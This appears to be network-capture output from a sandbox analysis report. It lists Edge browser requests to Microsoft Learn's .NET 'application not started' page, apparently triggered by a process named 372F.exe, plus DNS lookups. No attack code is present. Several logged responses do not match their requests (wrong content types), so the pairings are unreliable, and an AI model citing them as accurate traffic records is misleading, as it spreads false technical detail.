                                                                                                                https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: no-cors
                                                                                                                sec-fetch-dest: image
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 18367
                                                                                                                content-type: image/png
                                                                                                                last-modified: Wed, 10 Mar 2021 13:48:36 GMT
                                                                                                                etag: "0x8D8E3CB3429357A"
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                x-rendering-stack: Static
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0ClBaZAAAAABIOmtgHPgtSLwjGUqaEPMqTE9OMjEyMDUwNzE3MDIxADcxNjg5MjBlLTlmNWItNGE2Mi1iMTZlLWQ1YmU2M2NlNjFlNw==
                                                                                                                cache-control: public, max-age=378
                                                                                                                expires: Thu, 12 Oct 2023 20:54:52 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:34 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /en-us/dotnet/framework/install/media/application-not-started/install-3-5.png HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: no-cors
                                                                                                                sec-fetch-dest: image
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 13842
                                                                                                                content-type: image/png
                                                                                                                last-modified: Wed, 10 Mar 2021 13:48:26 GMT
                                                                                                                etag: "0x8D8E3CB2E2E71C7"
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                x-rendering-stack: Static
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0nrhhZAAAAAC/rPHwMgTHTbFwczlS6ZH2RlJBMzFFREdFMDMwMwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                cache-control: public, max-age=1676
                                                                                                                expires: Thu, 12 Oct 2023 21:16:30 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:34 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/media/logos/logo_net.svg
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /media/logos/logo_net.svg HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: no-cors
                                                                                                                sec-fetch-dest: image
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 301
                                                                                                                location: /en-us/media/logos/logo_net.svg
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0nlsoZQAAAAAHSrr9iVDoQa6XXUzuAuejQlJVMzBFREdFMTAxOQA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                content-length: 0
                                                                                                                cache-control: no-cache, no-store
                                                                                                                expires: Thu, 12 Oct 2023 20:48:34 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:34 GMT
                                                                                                                akamai-cache-status: Redirect from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                POST
                                                                                                                https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                POST /api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                content-length: 153
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                content-type: application/json
                                                                                                                accept: */*
                                                                                                                origin: https://learn.microsoft.com
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-dest: empty
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                cookie: MicrosoftApplicationsTelemetryDeviceId=9025e668-1ac7-4b9a-b2c8-057a9a60d657
                                                                                                                cookie: ai_session=bBAIDTPAtPr5G/Y6kxQBoP|1697143713604|1697143713604
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 98901
                                                                                                                content-type: image/png
                                                                                                                last-modified: Tue, 03 Oct 2023 22:58:44 GMT
                                                                                                                etag: "0x8DBC4644B8943D0"
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                x-rendering-stack: Static
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0V6IdZQAAAAB7s2cY8y5kSIB96Wk7QQsgQlJVMzBFREdFMTExNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                cache-control: public, max-age=1047
                                                                                                                expires: Thu, 12 Oct 2023 21:06:02 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:35 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/en-us/media/event-banners/banner-ignite-2023-flatcolor.png?branch=live
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /en-us/media/event-banners/banner-ignite-2023-flatcolor.png?branch=live HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: no-cors
                                                                                                                sec-fetch-dest: image
                                                                                                                referer: https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/fe274a7f.site-ltr.css
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                cookie: MicrosoftApplicationsTelemetryDeviceId=9025e668-1ac7-4b9a-b2c8-057a9a60d657
                                                                                                                cookie: ai_session=bBAIDTPAtPr5G/Y6kxQBoP|1697143713604|1697143713604
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 17956
                                                                                                                content-type: font/woff2
                                                                                                                last-modified: Mon, 09 Oct 2023 21:01:25 GMT
                                                                                                                etag: "0x8DBC90AE6AC067F"
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0VRAlZQAAAADjMj2EfUPIRqWVVf7OLJfkQlJVMzBFREdFMDcwOAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                cache-control: public, max-age=388913
                                                                                                                expires: Tue, 17 Oct 2023 08:50:28 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:35 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/docons.28d69bd4.woff2
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /_themes/docs.theme/master/en-us/_themes/styles/docons.28d69bd4.woff2 HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                origin: https://learn.microsoft.com
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                dnt: 1
                                                                                                                accept: */*
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-dest: font
                                                                                                                referer: https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/fe274a7f.site-ltr.css
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                cookie: MicrosoftApplicationsTelemetryDeviceId=9025e668-1ac7-4b9a-b2c8-057a9a60d657
                                                                                                                cookie: ai_session=bBAIDTPAtPr5G/Y6kxQBoP|1697143713604|1697143713604
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-type: image/svg+xml
                                                                                                                last-modified: Mon, 01 May 2023 22:46:35 GMT
                                                                                                                etag: "0x8DB4A95EAB97D55"
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                x-rendering-stack: Static
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0x1lQZAAAAAAFJ1oXoR2OTI/DIjg4nFxbTE9OMjFFREdFMTgxMgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                vary: Accept-Encoding
                                                                                                                content-encoding: gzip
                                                                                                                content-length: 542
                                                                                                                cache-control: public, max-age=1041
                                                                                                                expires: Thu, 12 Oct 2023 21:05:56 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:35 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /en-us/media/logos/logo_net.svg HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: no-cors
                                                                                                                sec-fetch-dest: image
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                cookie: MicrosoftApplicationsTelemetryDeviceId=9025e668-1ac7-4b9a-b2c8-057a9a60d657
                                                                                                                cookie: ai_session=bBAIDTPAtPr5G/Y6kxQBoP|1697143713604|1697143713604
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                content-encoding: gzip
                                                                                                                vary: Origin,Accept-Encoding
                                                                                                                access-control-allow-origin: https://learn.microsoft.com
                                                                                                                request-context: appId=cid-v1:8da7faac-355b-4ce1-beec-f624ec5c6263
                                                                                                                x-ms-operation-id: a36a4c94a2c50ff092b38d739ae38554
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-powered-by: ASP.NET
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0o1soZQAAAADY+0eb+M23SIORBWuFoVZrQlJVMzBFREdFMDcwOAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                content-length: 870
                                                                                                                cache-control: public, max-age=43180
                                                                                                                expires: Fri, 13 Oct 2023 08:48:15 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:35 GMT
                                                                                                                akamai-cache-status: Miss from child, Miss from parent
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/favicon.ico
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /favicon.ico HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: no-cors
                                                                                                                sec-fetch-dest: image
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                cookie: MicrosoftApplicationsTelemetryDeviceId=9025e668-1ac7-4b9a-b2c8-057a9a60d657
                                                                                                                cookie: ai_session=bBAIDTPAtPr5G/Y6kxQBoP|1697143713604|1697143713604
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 17174
                                                                                                                content-type: image/x-icon
                                                                                                                last-modified: Thu, 01 Jun 2023 01:34:23 GMT
                                                                                                                etag: "0x8DB6240546D1FAB"
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0HO18ZAAAAAD2V0kOsHHARaLs4TlNmskMQU1TMDRFREdFMTgxNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                cache-control: public, max-age=418370
                                                                                                                expires: Tue, 17 Oct 2023 17:01:25 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:35 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                POST
                                                                                                                https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                POST /api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                content-length: 153
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                content-type: application/json
                                                                                                                accept: */*
                                                                                                                origin: https://learn.microsoft.com
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-dest: empty
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                cookie: MicrosoftApplicationsTelemetryDeviceId=9025e668-1ac7-4b9a-b2c8-057a9a60d657
                                                                                                                cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
                                                                                                                cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6
                                                                                                                cookie: MSFPC=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
                                                                                                                cookie: ai_session=bBAIDTPAtPr5G/Y6kxQBoP|1697143713604|1697143741059
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                access-control-allow-origin: https://learn.microsoft.com
                                                                                                                content-encoding: gzip
                                                                                                                vary: Origin,Accept-Encoding
                                                                                                                request-context: appId=cid-v1:8da7faac-355b-4ce1-beec-f624ec5c6263
                                                                                                                x-ms-operation-id: 7e797fb042c10f033d25a9b40e496eea
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-powered-by: ASP.NET
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 20231012T204902Z-c43n5tuxh95592znk9txasfws000000008d0000000005m60
                                                                                                                content-length: 870
                                                                                                                cache-control: public, max-age=43173
                                                                                                                expires: Fri, 13 Oct 2023 08:48:36 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:49:03 GMT
                                                                                                                akamai-cache-status: Miss from child, Miss from parent
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/media/logos/logo_net.svg
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /media/logos/logo_net.svg HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: no-cors
                                                                                                                sec-fetch-dest: image
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                cookie: MicrosoftApplicationsTelemetryDeviceId=9025e668-1ac7-4b9a-b2c8-057a9a60d657
                                                                                                                cookie: ai_session=bBAIDTPAtPr5G/Y6kxQBoP|1697143713604|1697143713604
                                                                                                                cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
                                                                                                                cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6
                                                                                                                cookie: MSFPC=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
                                                                                                                Response
                                                                                                                HTTP/2.0 301
                                                                                                                location: /en-us/media/logos/logo_net.svg
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0x1soZQAAAAA/YcKWRgm1RbqMWBo6b8UGQlJVMzBFREdFMTExMgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                content-length: 0
                                                                                                                cache-control: no-cache, no-store
                                                                                                                expires: Thu, 12 Oct 2023 20:49:11 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:49:11 GMT
                                                                                                                akamai-cache-status: Miss from child, Miss from parent
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                139.2.85.104.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                139.2.85.104.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                139.2.85.104.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                a104-85-2-139deploystaticakamaitechnologiescom
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                139.2.85.104.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                139.2.85.104.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                139.2.85.104.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                a104-85-2-139deploystaticakamaitechnologiescom
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                202.28.22.171.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                202.28.22.171.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                202.28.22.171.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                202.28.22.171.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                65.9.196.185.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                65.9.196.185.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                65.9.196.185.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                65.9.196.185.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                wcpstatic.microsoft.com
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                wcpstatic.microsoft.com
                                                                                                                IN A
                                                                                                                Response
                                                                                                                wcpstatic.microsoft.com
                                                                                                                IN CNAME
                                                                                                                consentdeliveryfd.azurefd.net
                                                                                                                consentdeliveryfd.azurefd.net
                                                                                                                IN CNAME
                                                                                                                firstparty-azurefd-prod.trafficmanager.net
                                                                                                                firstparty-azurefd-prod.trafficmanager.net
                                                                                                                IN CNAME
